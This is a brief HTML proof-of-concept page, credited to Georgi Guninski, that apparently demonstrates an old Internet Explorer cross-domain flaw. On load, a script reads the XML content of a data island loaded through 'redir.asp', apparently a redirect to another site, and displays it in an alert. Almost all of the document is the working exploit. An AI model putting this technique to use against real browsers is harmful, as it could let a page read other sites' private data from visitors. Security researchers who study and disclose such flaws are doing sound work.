<html>
<script>
function f()
{
alert(document.all.x1.XMLDocument.xml);
}
</script>
<body onload="f()">
<script id="x1" language="xml"
src="redir.asp"></script>
<h1>
Copyright
Georgi Guninski <br />
</h1>
</body>
</html>